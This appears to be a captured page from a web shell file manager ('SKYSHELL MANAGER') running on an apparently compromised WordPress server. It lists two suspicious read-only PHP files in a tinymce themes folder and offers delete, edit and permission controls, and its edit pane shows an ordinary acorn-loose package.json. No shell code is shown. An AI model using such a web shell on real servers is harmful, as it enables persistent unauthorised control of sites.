📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "acorn-loose", "description": "Error-tolerant ECMAScript parser", "homepage": "https://github.com/acornjs/acorn", "main": "dist/acorn-loose.js", "module": "dist/acorn-loose.mjs", "exports": { ".": [ { "import": "./dist/acorn-loose.mjs", "require": "./dist/acorn-loose.js", "default": "./dist/acorn-loose.js" }, "./dist/acorn-loose.js" ], "./package.json": "./package.json" }, "version": "8.3.0", "engines": { "node": ">=0.4.0" }, "dependencies": { "acorn": "^8.5.0" }, "maintainers": [ { "name": "Marijn Haverbeke", "email": "marijnh@gmail.com", "web": "https://marijnhaverbeke.nl" }, { "name": "Ingvar Stepanyan", "email": "me@rreverser.com", "web": "https://rreverser.com/" }, { "name": "Adrian Heine", "web": "http://adrianheine.de" } ], "repository": { "type": "git", "url": "https://github.com/acornjs/acorn.git" }, "scripts": { "prepare": "cd ..; npm run build:loose" }, "license": "MIT" }
Save